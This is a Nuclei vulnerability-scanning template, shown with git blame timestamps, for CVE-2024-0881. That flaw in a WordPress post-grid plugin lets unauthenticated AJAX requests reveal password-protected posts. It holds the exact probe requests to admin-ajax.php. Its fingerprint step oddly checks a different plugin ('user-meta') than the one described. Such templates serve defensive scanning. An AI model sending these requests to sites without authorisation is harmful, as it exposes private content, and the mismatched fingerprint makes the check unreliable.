nuclei-templates/http/cves/2024/CVE-2024-0881.yaml

55 lines
1.7 KiB
YAML
Raw Normal View History

2024-05-01 14:27:37 +00:00
id: CVE-2024-0881
info:
2024-05-07 12:29:13 +00:00
name: Combo Blocks < 2.2.76 - Improper Access Control
2024-05-01 14:27:37 +00:00
author: Kazgangap
severity: medium
description: |
The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
reference:
- https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/
2024-05-03 11:10:01 +00:00
- https://github.com/fkie-cad/nvd-json-data-feeds
2024-05-07 12:29:13 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2024-0881
2024-05-01 14:27:37 +00:00
classification:
2024-05-07 12:29:13 +00:00
cve-id: CVE-2024-0881
cwe-id: CWE-284
2024-05-01 14:27:37 +00:00
epss-score: 0.00043
2024-05-07 11:57:32 +00:00
epss-percentile: 0.08268
2024-05-03 11:10:01 +00:00
metadata:
2024-05-07 11:57:32 +00:00
verified: true
2024-05-07 12:29:13 +00:00
max-request: 3
2024-05-07 11:57:32 +00:00
publicwww-query: "/wp-content/plugins/user-meta/"
2024-05-07 12:29:13 +00:00
tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure
2024-05-07 11:57:32 +00:00
flow: http(1) && http(2)
2024-05-01 14:27:37 +00:00
http:
2024-05-07 11:57:32 +00:00
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/user-meta/readme.txt'
matchers:
- type: word
internal: true
words:
- 'User Profile Builder'
2024-05-01 14:27:37 +00:00
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"
2024-05-07 11:57:32 +00:00
stop-at-first-match: true
2024-05-01 14:27:37 +00:00
matchers-condition: and
matchers:
- type: word
words:
2024-05-07 12:29:13 +00:00
- '{"html"'
2024-05-01 14:27:37 +00:00
- '"<div class='
2024-05-07 11:57:32 +00:00
- '"pagination":'
2024-05-03 11:10:01 +00:00
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100deb3c2cb011969081041e458abc53a53013e5cb05bbe14f59c1faa72c014be17022100ba25e790d6e9b2dc420759b41b40d92f93167855db55d6862f69a8bfae5c740d:922c64590222798bb761d5b6d8e72950